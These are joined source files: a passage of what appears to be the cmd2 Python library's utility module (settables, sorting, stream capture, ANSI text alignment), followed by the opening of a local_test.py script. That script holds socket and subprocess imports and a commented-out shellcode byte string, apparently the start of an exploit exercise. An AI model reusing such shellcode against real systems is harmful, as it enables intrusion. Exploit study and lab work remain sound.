:param name: name of the instance attribute being made settable
:param val_type: callable used to cast the string value from the command line into its proper type and
even validate its value. Setting this to bool provides tab completion for true/false and
validation using str_to_bool(). The val_type function should raise an exception if it fails.
This exception will be caught and printed by Cmd.do_set().
:param description: string describing this setting
:param settable_object: object to which the instance attribute belongs (e.g. self)
:param settable_attrib_name: name which displays to the user in the output of the set command.
Defaults to `name` if not specified.
:param onchange_cb: optional function or method to call when the value of this settable is altered
by the set command. (e.g. onchange_cb=self.debug_changed)
Cmd.do_set() passes the following 3 arguments to onchange_cb:
param_name: str - name of the changed parameter
old_value: Any - the value before being changed
new_value: Any - the value after being changed
The following optional settings provide tab completion for a parameter's values. They correspond to the
same settings in argparse-based tab completion. A maximum of one of these should be provided.
:param choices: iterable of accepted values
:param choices_provider: function that provides choices for this argument
:param completer: tab completion function that provides choices for this argument
"""
if val_type == bool:
def get_bool_choices(_) -> List[str]: # type: ignore[no-untyped-def]
"""Used to tab complete lowercase boolean values"""
return ['true', 'false']
val_type = str_to_bool
choices_provider = cast(ChoicesProviderFunc, get_bool_choices)
self.name = name
self.val_type = val_type
self.description = description
self.settable_obj = settable_object
self.settable_attrib_name = settable_attrib_name if settable_attrib_name is not None else name
self.onchange_cb = onchange_cb
self.choices = choices
self.choices_provider = choices_provider
self.completer = completer
def get_value(self) -> Any:
"""
Get the value of the settable attribute
:return:
"""
return getattr(self.settable_obj, self.settable_attrib_name)
def set_value(self, value: Any) -> Any:
"""
Set the settable attribute on the specified destination object
:param value: New value to set
:return: New value that the attribute was set to
"""
# Run the value through its type function to handle any conversion or validation
new_value = self.val_type(value)
# Make sure new_value is a valid choice
if self.choices is not None and new_value not in self.choices:
choices_str = ', '.join(map(repr, self.choices))
raise ValueError(f"invalid choice: {new_value!r} (choose from {choices_str})")
# Try to update the settable's value
orig_value = self.get_value()
setattr(self.settable_obj, self.settable_attrib_name, new_value)
# Check if we need to call an onchange callback
if orig_value != new_value and self.onchange_cb:
self.onchange_cb(self.name, orig_value, new_value)
return new_value
def is_text_file(file_path: str) -> bool:
"""Returns if a file contains only ASCII or UTF-8 encoded text and isn't empty.
:param file_path: path to the file being checked
:return: True if the file is a non-empty text file, otherwise False
:raises OSError if file can't be read
"""
import codecs
expanded_path = os.path.abspath(os.path.expanduser(file_path.strip()))
valid_text_file = False
# Only need to check for utf-8 compliance since that covers ASCII, too
try:
with codecs.open(expanded_path, encoding='utf-8', errors='strict') as f:
# Make sure the file has only utf-8 text and is not empty
if sum(1 for _ in f) > 0:
valid_text_file = True
except OSError:
raise
except UnicodeDecodeError:
# Not UTF-8
pass
return valid_text_file
def remove_duplicates(list_to_prune: List[_T]) -> List[_T]:
"""Removes duplicates from a list while preserving order of the items.
:param list_to_prune: the list being pruned of duplicates
:return: The pruned list
"""
temp_dict: collections.OrderedDict[_T, Any] = collections.OrderedDict()
for item in list_to_prune:
temp_dict[item] = None
return list(temp_dict.keys())
def norm_fold(astr: str) -> str:
"""Normalize and casefold Unicode strings for saner comparisons.
:param astr: input unicode string
:return: a normalized and case-folded version of the input string
"""
return unicodedata.normalize('NFC', astr).casefold()
def alphabetical_sort(list_to_sort: Iterable[str]) -> List[str]:
"""Sorts a list of strings alphabetically.
For example: ['a1', 'A11', 'A2', 'a22', 'a3']
To sort a list in place, don't call this method, which makes a copy. Instead, do this:
my_list.sort(key=norm_fold)
:param list_to_sort: the list being sorted
:return: the sorted list
"""
return sorted(list_to_sort, key=norm_fold)
def try_int_or_force_to_lower_case(input_str: str) -> Union[int, str]:
"""
Tries to convert the passed-in string to an integer. If that fails, it converts it to lower case using norm_fold.
:param input_str: string to convert
:return: the string as an integer or a lower case version of the string
"""
try:
return int(input_str)
except ValueError:
return norm_fold(input_str)
def natural_keys(input_str: str) -> List[Union[int, str]]:
"""
Converts a string into a list of integers and strings to support natural sorting (see natural_sort).
For example: natural_keys('abc123def') -> ['abc', '123', 'def']
:param input_str: string to convert
:return: list of strings and integers
"""
return [try_int_or_force_to_lower_case(substr) for substr in re.split(r'(\d+)', input_str)]
def natural_sort(list_to_sort: Iterable[str]) -> List[str]:
"""
Sorts a list of strings case insensitively as well as numerically.
For example: ['a1', 'A2', 'a3', 'A11', 'a22']
To sort a list in place, don't call this method, which makes a copy. Instead, do this:
my_list.sort(key=natural_keys)
:param list_to_sort: the list being sorted
:return: the list sorted naturally
"""
return sorted(list_to_sort, key=natural_keys)
def quote_specific_tokens(tokens: List[str], tokens_to_quote: List[str]) -> None:
"""
Quote specific tokens in a list
:param tokens: token list being edited
:param tokens_to_quote: the tokens, which if present in tokens, to quote
"""
for i, token in enumerate(tokens):
if token in tokens_to_quote:
tokens[i] = quote_string(token)
def unquote_specific_tokens(tokens: List[str], tokens_to_unquote: List[str]) -> None:
"""
Unquote specific tokens in a list
:param tokens: token list being edited
:param tokens_to_unquote: the tokens, which if present in tokens, to unquote
"""
for i, token in enumerate(tokens):
unquoted_token = strip_quotes(token)
if unquoted_token in tokens_to_unquote:
tokens[i] = unquoted_token
def expand_user(token: str) -> str:
"""
Wrap os.expanduser() to support expanding ~ in quoted strings
:param token: the string to expand
"""
if token:
if is_quoted(token):
quote_char = token[0]
token = strip_quotes(token)
else:
quote_char = ''
token = os.path.expanduser(token)
# Restore the quotes even if not needed to preserve what the user typed
if quote_char:
token = quote_char + token + quote_char
return token
def expand_user_in_tokens(tokens: List[str]) -> None:
"""
Call expand_user() on all tokens in a list of strings
:param tokens: tokens to expand
"""
for index, _ in enumerate(tokens):
tokens[index] = expand_user(tokens[index])
def find_editor() -> Optional[str]:
"""
Used to set cmd2.Cmd.DEFAULT_EDITOR. If EDITOR env variable is set, that will be used.
Otherwise the function will look for a known editor in directories specified by PATH env variable.
:return: Default editor or None
"""
editor = os.environ.get('EDITOR')
if not editor:
if sys.platform[:3] == 'win':
editors = ['code.cmd', 'notepad++.exe', 'notepad.exe']
else:
editors = ['vim', 'vi', 'emacs', 'nano', 'pico', 'joe', 'code', 'subl', 'atom', 'gedit', 'geany', 'kate']
# Get a list of every directory in the PATH environment variable and ignore symbolic links
env_path = os.getenv('PATH')
if env_path is None:
paths = []
else:
paths = [p for p in env_path.split(os.path.pathsep) if not os.path.islink(p)]
for editor, path in itertools.product(editors, paths):
editor_path = os.path.join(path, editor)
if os.path.isfile(editor_path) and os.access(editor_path, os.X_OK):
if sys.platform[:3] == 'win':
# Remove extension from Windows file names
editor = os.path.splitext(editor)[0]
break
else:
editor = None
return editor
def files_from_glob_pattern(pattern: str, access: int = os.F_OK) -> List[str]:
"""Return a list of file paths based on a glob pattern.
Only files are returned, not directories, and optionally only files for which the user has a specified access to.
:param pattern: file name or glob pattern
:param access: file access type to verify (os.* where * is F_OK, R_OK, W_OK, or X_OK)
:return: list of files matching the name or glob pattern
"""
return [f for f in glob.glob(pattern) if os.path.isfile(f) and os.access(f, access)]
def files_from_glob_patterns(patterns: List[str], access: int = os.F_OK) -> List[str]:
"""Return a list of file paths based on a list of glob patterns.
Only files are returned, not directories, and optionally only files for which the user has a specified access to.
:param patterns: list of file names and/or glob patterns
:param access: file access type to verify (os.* where * is F_OK, R_OK, W_OK, or X_OK)
:return: list of files matching the names and/or glob patterns
"""
files = []
for pattern in patterns:
matches = files_from_glob_pattern(pattern, access=access)
files.extend(matches)
return files
def get_exes_in_path(starts_with: str) -> List[str]:
"""Returns names of executables in a user's path
:param starts_with: what the exes should start with. leave blank for all exes in path.
:return: a list of matching exe names
"""
# Purposely don't match any executable containing wildcards
wildcards = ['*', '?']
for wildcard in wildcards:
if wildcard in starts_with:
return []
# Get a list of every directory in the PATH environment variable and ignore symbolic links
env_path = os.getenv('PATH')
if env_path is None:
paths = []
else:
paths = [p for p in env_path.split(os.path.pathsep) if not os.path.islink(p)]
# Use a set to store exe names since there can be duplicates
exes_set = set()
# Find every executable file in the user's path that matches the pattern
for path in paths:
full_path = os.path.join(path, starts_with)
matches = files_from_glob_pattern(full_path + '*', access=os.X_OK)
for match in matches:
exes_set.add(os.path.basename(match))
return list(exes_set)
class StdSim:
"""
Class to simulate behavior of sys.stdout or sys.stderr.
Stores contents in internal buffer and optionally echos to the inner stream it is simulating.
"""
def __init__(
self,
inner_stream: Union[TextIO, 'StdSim'],
*,
echo: bool = False,
encoding: str = 'utf-8',
errors: str = 'replace',
) -> None:
"""
StdSim Initializer
:param inner_stream: the wrapped stream. Should be a TextIO or StdSim instance.
:param echo: if True, then all input will be echoed to inner_stream
:param encoding: codec for encoding/decoding strings (defaults to utf-8)
:param errors: how to handle encoding/decoding errors (defaults to replace)
"""
self.inner_stream = inner_stream
self.echo = echo
self.encoding = encoding
self.errors = errors
self.pause_storage = False
self.buffer = ByteBuf(self)
def write(self, s: str) -> None:
"""
Add str to internal bytes buffer and if echo is True, echo contents to inner stream
:param s: String to write to the stream
"""
if not isinstance(s, str):
raise TypeError(f'write() argument must be str, not {type(s)}')
if not self.pause_storage:
self.buffer.byte_buf += s.encode(encoding=self.encoding, errors=self.errors)
if self.echo:
self.inner_stream.write(s)
def getvalue(self) -> str:
"""Get the internal contents as a str"""
return self.buffer.byte_buf.decode(encoding=self.encoding, errors=self.errors)
def getbytes(self) -> bytes:
"""Get the internal contents as bytes"""
return bytes(self.buffer.byte_buf)
def read(self, size: Optional[int] = -1) -> str:
"""
Read from the internal contents as a str and then clear them out
:param size: Number of bytes to read from the stream
"""
if size is None or size == -1:
result = self.getvalue()
self.clear()
else:
result = self.buffer.byte_buf[:size].decode(encoding=self.encoding, errors=self.errors)
self.buffer.byte_buf = self.buffer.byte_buf[size:]
return result
def readbytes(self) -> bytes:
"""Read from the internal contents as bytes and then clear them out"""
result = self.getbytes()
self.clear()
return result
def clear(self) -> None:
"""Clear the internal contents"""
self.buffer.byte_buf.clear()
def isatty(self) -> bool:
"""StdSim only considered an interactive stream if `echo` is True and `inner_stream` is a tty."""
if self.echo:
return self.inner_stream.isatty()
else:
return False
@property
def line_buffering(self) -> bool:
"""
Handle when the inner stream doesn't have a line_buffering attribute which is the case
when running unit tests because pytest sets stdout to a pytest EncodedFile object.
"""
try:
return bool(self.inner_stream.line_buffering)
except AttributeError:
return False
def __getattr__(self, item: str) -> Any:
if item in self.__dict__:
return self.__dict__[item]
else:
return getattr(self.inner_stream, item)
class ByteBuf:
"""
Used by StdSim to write binary data and stores the actual bytes written
"""
# Used to know when to flush the StdSim
NEWLINES = [b'\n', b'\r']
def __init__(self, std_sim_instance: StdSim) -> None:
self.byte_buf = bytearray()
self.std_sim_instance = std_sim_instance
def write(self, b: bytes) -> None:
"""Add bytes to internal bytes buffer and if echo is True, echo contents to inner stream."""
if not isinstance(b, bytes):
raise TypeError(f'a bytes-like object is required, not {type(b)}')
if not self.std_sim_instance.pause_storage:
self.byte_buf += b
if self.std_sim_instance.echo:
self.std_sim_instance.inner_stream.buffer.write(b)
# Since StdSim wraps TextIO streams, we will flush the stream if line buffering is on
# and the bytes being written contain a new line character. This is helpful when StdSim
# is being used to capture output of a shell command because it causes the output to print
# to the screen more often than if we waited for the stream to flush its buffer.
if self.std_sim_instance.line_buffering:
if any(newline in b for newline in ByteBuf.NEWLINES):
self.std_sim_instance.flush()
class ProcReader:
"""
Used to capture stdout and stderr from a Popen process if any of those were set to subprocess.PIPE.
If neither are pipes, then the process will run normally and no output will be captured.
"""
def __init__(self, proc: PopenTextIO, stdout: Union[StdSim, TextIO], stderr: Union[StdSim, TextIO]) -> None:
"""
ProcReader initializer
:param proc: the Popen process being read from
:param stdout: the stream to write captured stdout
:param stderr: the stream to write captured stderr
"""
self._proc = proc
self._stdout = stdout
self._stderr = stderr
self._out_thread = threading.Thread(name='out_thread', target=self._reader_thread_func, kwargs={'read_stdout': True})
self._err_thread = threading.Thread(name='err_thread', target=self._reader_thread_func, kwargs={'read_stdout': False})
# Start the reader threads for pipes only
if self._proc.stdout is not None:
self._out_thread.start()
if self._proc.stderr is not None:
self._err_thread.start()
def send_sigint(self) -> None:
"""Send a SIGINT to the process similar to if <Ctrl>+C were pressed"""
import signal
if sys.platform.startswith('win'):
# cmd2 started the Windows process in a new process group. Therefore we must send
# a CTRL_BREAK_EVENT since CTRL_C_EVENT signals cannot be generated for process groups.
self._proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
# Since cmd2 uses shell=True in its Popen calls, we need to send the SIGINT to
# the whole process group to make sure it propagates further than the shell
try:
group_id = os.getpgid(self._proc.pid)
os.killpg(group_id, signal.SIGINT)
except ProcessLookupError:
return
def terminate(self) -> None:
"""Terminate the process"""
self._proc.terminate()
def wait(self) -> None:
"""Wait for the process to finish"""
if self._out_thread.is_alive():
self._out_thread.join()
if self._err_thread.is_alive():
self._err_thread.join()
# Handle case where the process ended before the last read could be done.
# This will return None for the streams that weren't pipes.
out, err = self._proc.communicate()
if out:
self._write_bytes(self._stdout, out)
if err:
self._write_bytes(self._stderr, err)
def _reader_thread_func(self, read_stdout: bool) -> None:
"""
Thread function that reads a stream from the process
:param read_stdout: if True, then this thread deals with stdout. Otherwise it deals with stderr.
"""
if read_stdout:
read_stream = self._proc.stdout
write_stream = self._stdout
else:
read_stream = self._proc.stderr
write_stream = self._stderr
# The thread should have been started only if this stream was a pipe
assert read_stream is not None
# Run until process completes
while self._proc.poll() is None:
# noinspection PyUnresolvedReferences
available = read_stream.peek() # type: ignore[attr-defined]
if available:
read_stream.read(len(available))
self._write_bytes(write_stream, available)
@staticmethod
def _write_bytes(stream: Union[StdSim, TextIO], to_write: bytes) -> None:
"""
Write bytes to a stream
:param stream: the stream being written to
:param to_write: the bytes being written
"""
try:
stream.buffer.write(to_write)
except BrokenPipeError:
# This occurs if output is being piped to a process that closed
pass
class ContextFlag:
"""A context manager which is also used as a boolean flag value within the default sigint handler.
Its main use is as a flag to prevent the SIGINT handler in cmd2 from raising a KeyboardInterrupt
while a critical code section has set the flag to True. Because signal handling is always done on the
main thread, this class is not thread-safe since there is no need.
"""
def __init__(self) -> None:
# When this flag has a positive value, it is considered set.
# When it is 0, it is not set. It should never go below 0.
self.__count = 0
def __bool__(self) -> bool:
return self.__count > 0
def __enter__(self) -> None:
self.__count += 1
def __exit__(self, *args: Any) -> None:
self.__count -= 1
if self.__count < 0:
raise ValueError("count has gone below 0")
class RedirectionSavedState:
"""Created by each command to store information required to restore state after redirection"""
def __init__(
self,
self_stdout: Union[StdSim, TextIO],
sys_stdout: Union[StdSim, TextIO],
pipe_proc_reader: Optional[ProcReader],
saved_redirecting: bool,
) -> None:
"""
RedirectionSavedState initializer
:param self_stdout: saved value of Cmd.stdout
:param sys_stdout: saved value of sys.stdout
:param pipe_proc_reader: saved value of Cmd._cur_pipe_proc_reader
:param saved_redirecting: saved value of Cmd._redirecting
"""
# Tells if command is redirecting
self.redirecting = False
# Used to restore values after redirection ends
self.saved_self_stdout = self_stdout
self.saved_sys_stdout = sys_stdout
# Used to restore values after command ends regardless of whether the command redirected
self.saved_pipe_proc_reader = pipe_proc_reader
self.saved_redirecting = saved_redirecting
def _remove_overridden_styles(styles_to_parse: List[str]) -> List[str]:
"""
Utility function for align_text() / truncate_line() which filters a style list down
to only those which would still be in effect if all were processed in order.
This is mainly used to reduce how many style strings are stored in memory when
building large multiline strings with ANSI styles. We only need to carry over
styles from previous lines that are still in effect.
:param styles_to_parse: list of styles to evaluate.
:return: list of styles that are still in effect.
"""
from . import (
ansi,
)
class StyleState:
"""Keeps track of what text styles are enabled"""
def __init__(self) -> None:
# Contains styles still in effect, keyed by their index in styles_to_parse
self.style_dict: Dict[int, str] = dict()
# Indexes into style_dict
self.reset_all: Optional[int] = None
self.fg: Optional[int] = None
self.bg: Optional[int] = None
self.intensity: Optional[int] = None
self.italic: Optional[int] = None
self.overline: Optional[int] = None
self.strikethrough: Optional[int] = None
self.underline: Optional[int] = None
# Read the previous styles in order and keep track of their states
style_state = StyleState()
for index, style in enumerate(styles_to_parse):
# For styles types that we recognize, only keep their latest value from styles_to_parse.
# All unrecognized style types will be retained and their order preserved.
if style in (str(ansi.TextStyle.RESET_ALL), str(ansi.TextStyle.ALT_RESET_ALL)):
style_state = StyleState()
style_state.reset_all = index
elif ansi.STD_FG_RE.match(style) or ansi.EIGHT_BIT_FG_RE.match(style) or ansi.RGB_FG_RE.match(style):
if style_state.fg is not None:
style_state.style_dict.pop(style_state.fg)
style_state.fg = index
elif ansi.STD_BG_RE.match(style) or ansi.EIGHT_BIT_BG_RE.match(style) or ansi.RGB_BG_RE.match(style):
if style_state.bg is not None:
style_state.style_dict.pop(style_state.bg)
style_state.bg = index
elif style in (
str(ansi.TextStyle.INTENSITY_BOLD),
str(ansi.TextStyle.INTENSITY_DIM),
str(ansi.TextStyle.INTENSITY_NORMAL),
):
if style_state.intensity is not None:
style_state.style_dict.pop(style_state.intensity)
style_state.intensity = index
elif style in (str(ansi.TextStyle.ITALIC_ENABLE), str(ansi.TextStyle.ITALIC_DISABLE)):
if style_state.italic is not None:
style_state.style_dict.pop(style_state.italic)
style_state.italic = index
elif style in (str(ansi.TextStyle.OVERLINE_ENABLE), str(ansi.TextStyle.OVERLINE_DISABLE)):
if style_state.overline is not None:
style_state.style_dict.pop(style_state.overline)
style_state.overline = index
elif style in (str(ansi.TextStyle.STRIKETHROUGH_ENABLE), str(ansi.TextStyle.STRIKETHROUGH_DISABLE)):
if style_state.strikethrough is not None:
style_state.style_dict.pop(style_state.strikethrough)
style_state.strikethrough = index
elif style in (str(ansi.TextStyle.UNDERLINE_ENABLE), str(ansi.TextStyle.UNDERLINE_DISABLE)):
if style_state.underline is not None:
style_state.style_dict.pop(style_state.underline)
style_state.underline = index
# Store this style and its location in the dictionary
style_state.style_dict[index] = style
return list(style_state.style_dict.values())
class TextAlignment(Enum):
"""Horizontal text alignment"""
LEFT = 1
CENTER = 2
RIGHT = 3
def align_text(
text: str,
alignment: TextAlignment,
*,
fill_char: str = ' ',
width: Optional[int] = None,
tab_width: int = 4,
truncate: bool = False,
) -> str:
"""
Align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
There are convenience wrappers around this function: align_left(), align_center(), and align_right()
:param text: text to align (can contain multiple lines)
:param alignment: how to align the text
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then each line will be shortened to fit within the display width. The truncated
portions are replaced by a '…' character. Defaults to False.
:return: aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
import io
import shutil
from . import (
ansi,
)
if width is None:
width = shutil.get_terminal_size().columns
if width < 1:
raise ValueError("width must be at least 1")
# Convert tabs to spaces
text = text.replace('\t', ' ' * tab_width)
fill_char = fill_char.replace('\t', ' ')
# Save fill_char with no styles for use later
stripped_fill_char = ansi.strip_style(fill_char)
if len(stripped_fill_char) != 1:
raise TypeError("Fill character must be exactly one character long")
fill_char_width = ansi.style_aware_wcswidth(fill_char)
if fill_char_width == -1:
raise (ValueError("Fill character is an unprintable character"))
# Isolate the style chars before and after the fill character. We will use them when building sequences of
# fill characters. Instead of repeating the style characters for each fill character, we'll wrap each sequence.
fill_char_style_begin, fill_char_style_end = fill_char.split(stripped_fill_char)
if text:
lines = text.splitlines()
else:
lines = ['']
text_buf = io.StringIO()
# ANSI style sequences that may affect subsequent lines will be cancelled by the fill_char's style.
# To avoid this, we save styles which are still in effect so we can restore them when beginning the next line.
# This also allows lines to be used independently and still have their style. TableCreator does this.
previous_styles: List[str] = []
for index, line in enumerate(lines):
if index > 0:
text_buf.write('\n')
if truncate:
line = truncate_line(line, width)
line_width = ansi.style_aware_wcswidth(line)
if line_width == -1:
raise (ValueError("Text to align contains an unprintable character"))
# Get list of styles in this line
line_styles = list(get_styles_dict(line).values())
# Calculate how wide each side of filling needs to be
if line_width >= width:
# Don't return here even though the line needs no fill chars.
# There may be styles sequences to restore.
total_fill_width = 0
else:
total_fill_width = width - line_width
if alignment == TextAlignment.LEFT:
left_fill_width = 0
right_fill_width = total_fill_width
elif alignment == TextAlignment.CENTER:
left_fill_width = total_fill_width // 2
right_fill_width = total_fill_width - left_fill_width
else:
left_fill_width = total_fill_width
right_fill_width = 0
# Determine how many fill characters are needed to cover the width
left_fill = (left_fill_width // fill_char_width) * stripped_fill_char
right_fill = (right_fill_width // fill_char_width) * stripped_fill_char
# In cases where the fill character display width didn't divide evenly into
# the gap being filled, pad the remainder with space.
left_fill += ' ' * (left_fill_width - ansi.style_aware_wcswidth(left_fill))
right_fill += ' ' * (right_fill_width - ansi.style_aware_wcswidth(right_fill))
# Don't allow styles in fill characters and text to affect one another
if fill_char_style_begin or fill_char_style_end or previous_styles or line_styles:
if left_fill:
left_fill = ansi.TextStyle.RESET_ALL + fill_char_style_begin + left_fill + fill_char_style_end
left_fill += ansi.TextStyle.RESET_ALL
if right_fill:
right_fill = ansi.TextStyle.RESET_ALL + fill_char_style_begin + right_fill + fill_char_style_end
right_fill += ansi.TextStyle.RESET_ALL
# Write the line and restore styles from previous lines which are still in effect
text_buf.write(left_fill + ''.join(previous_styles) + line + right_fill)
# Update list of styles that are still in effect for the next line
previous_styles.extend(line_styles)
previous_styles = _remove_overridden_styles(previous_styles)
return text_buf.getvalue()
def align_left(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Left align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to left align (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: left-aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.LEFT, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def align_center(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Center text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to center (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: centered text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.CENTER, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def align_right(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Right align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to right align (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: right-aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.RIGHT, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def truncate_line(line: str, max_width: int, *, tab_width: int = 4) -> str:
"""
Truncate a single line to fit within a given display width. Any portion of the string that is truncated
is replaced by a '…' character. Supports characters with display widths greater than 1. ANSI style sequences
do not count toward the display width.
If there are ANSI style sequences in the string after where truncation occurs, this function will append them
to the returned string.
This is done to prevent issues caused in cases like: truncate_line(Fg.BLUE + hello + Fg.RESET, 3)
In this case, "hello" would be truncated before Fg.RESET resets the color from blue. Appending the remaining style
sequences makes sure the style is in the same state had the entire string been printed. align_text() relies on this
behavior when preserving style over multiple lines.
:param line: text to truncate
:param max_width: the maximum display width the resulting string is allowed to have
:param tab_width: any tabs in the text will be replaced with this many spaces
:return: line that has a display width less than or equal to width
:raises: ValueError if text contains an unprintable character like a newline
:raises: ValueError if max_width is less than 1
"""
import io
from . import (
ansi,
)
# Handle tabs
line = line.replace('\t', ' ' * tab_width)
if ansi.style_aware_wcswidth(line) == -1:
raise (ValueError("text contains an unprintable character"))
if max_width < 1:
raise ValueError("max_width must be at least 1")
if ansi.style_aware_wcswidth(line) <= max_width:
return line
# Find all style sequences in the line
styles_dict = get_styles_dict(line)
# Add characters one by one and preserve all style sequences
done = False
index = 0
total_width = 0
truncated_buf = io.StringIO()
while not done:
# Check if a style sequence is at this index. These don't count toward display width.
if index in styles_dict:
truncated_buf.write(styles_dict[index])
style_len = len(styles_dict[index])
styles_dict.pop(index)
index += style_len
continue
char = line[index]
char_width = ansi.style_aware_wcswidth(char)
# This char will make the text too wide, add the ellipsis instead
if char_width + total_width >= max_width:
char = constants.HORIZONTAL_ELLIPSIS
char_width = ansi.style_aware_wcswidth(char)
done = True
total_width += char_width
truncated_buf.write(char)
index += 1
# Filter out overridden styles from the remaining ones
remaining_styles = _remove_overridden_styles(list(styles_dict.values()))
# Append the remaining styles to the truncated text
truncated_buf.write(''.join(remaining_styles))
return truncated_buf.getvalue()
def get_styles_dict(text: str) -> Dict[int, str]:
"""
Return an OrderedDict containing all ANSI style sequences found in a string
The structure of the dictionary is:
key: index where sequences begins
value: ANSI style sequence found at index in text
Keys are in ascending order
:param text: text to search for style sequences
"""
from . import (
ansi,
)
start = 0
styles = collections.OrderedDict()
while True:
match = ansi.ANSI_STYLE_RE.search(text, start)
if match is None:
break
styles[match.start()] = match.group()
start += len(match.group())
return styles
def categorize(func: Union[Callable[..., Any], Iterable[Callable[..., Any]]], category: str) -> None:
"""Categorize a function.
The help command output will group the passed function under the
specified category heading
:param func: function or list of functions to categorize
:param category: category to put it in
:Example:
>>> import cmd2
>>> class MyApp(cmd2.Cmd):
>>> def do_echo(self, arglist):
>>> self.poutput(' '.join(arglist)
>>>
>>> cmd2.utils.categorize(do_echo, "Text Processing")
For an alternative approach to categorizing commands using a decorator, see
:func:`~cmd2.decorators.with_category`
"""
if isinstance(func, Iterable):
for item in func:
setattr(item, constants.CMD_ATTR_HELP_CATEGORY, category)
else:
if inspect.ismethod(func):
setattr(func.__func__, constants.CMD_ATTR_HELP_CATEGORY, category) # type: ignore[attr-defined]
else:
setattr(func, constants.CMD_ATTR_HELP_CATEGORY, category)
def get_defining_class(meth: Callable[..., Any]) -> Optional[Type[Any]]:
"""
Attempts to resolve the class that defined a method.
Inspired by implementation published here:
https://stackoverflow.com/a/25959545/1956611
:param meth: method to inspect
:return: class type in which the supplied method was defined. None if it couldn't be resolved.
"""
if isinstance(meth, functools.partial):
return get_defining_class(meth.func)
if inspect.ismethod(meth) or (
inspect.isbuiltin(meth)
and getattr(meth, '__self__') is not None
and getattr(meth.__self__, '__class__') # type: ignore[attr-defined]
):
for cls in inspect.getmro(meth.__self__.__class__): # type: ignore[attr-defined]
if meth.__name__ in cls.__dict__:
return cls
meth = getattr(meth, '__func__', meth) # fallback to __qualname__ parsing
if inspect.isfunction(meth):
cls = getattr(inspect.getmodule(meth), meth.__qualname__.split('.<locals>', 1)[0].rsplit('.', 1)[0])
if isinstance(cls, type):
return cls
return cast(type, getattr(meth, '__objclass__', None)) # handle special descriptor objects
class CompletionMode(Enum):
"""Enum for what type of tab completion to perform in cmd2.Cmd.read_input()"""
# Tab completion will be disabled during read_input() call
# Use of custom up-arrow history supported
NONE = 1
# read_input() will tab complete cmd2 commands and their arguments
# cmd2's command line history will be used for up arrow if history is not provided.
# Otherwise use of custom up-arrow history supported.
COMMANDS = 2
# read_input() will tab complete based on one of its following parameters:
# choices, choices_provider, completer, parser
# Use of custom up-arrow history supported
CUSTOM = 3
class CustomCompletionSettings:
"""Used by cmd2.Cmd.complete() to tab complete strings other than command arguments"""
def __init__(self, parser: argparse.ArgumentParser, *, preserve_quotes: bool = False) -> None:
"""
Initializer
:param parser: arg parser defining format of string being tab completed
:param preserve_quotes: if True, then quoted tokens will keep their quotes when processed by
ArgparseCompleter. This is helpful in cases when you're tab completing
flag-like tokens (e.g. -o, --option) and you don't want them to be
treated as argparse flags when quoted. Set this to True if you plan
on passing the string to argparse with the tokens still quoted.
"""
self.parser = parser
self.preserve_quotes = preserve_quotes
|
local_test.py
|
#!/bin/python3
import subprocess
import time
import struct
import sys
import threading
import socket
import os
#shellcode = b"\x04\x00\r4\x06\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\xf9\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\x00\x00\x8e\x81\x00\x00\x00\x00\x00\x00\x00\x00\xfc\xff\xc0\x1d\x00\x00\x00\x00\xff\xff\x08!\xeb\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10\x00\x00\x00\x00"
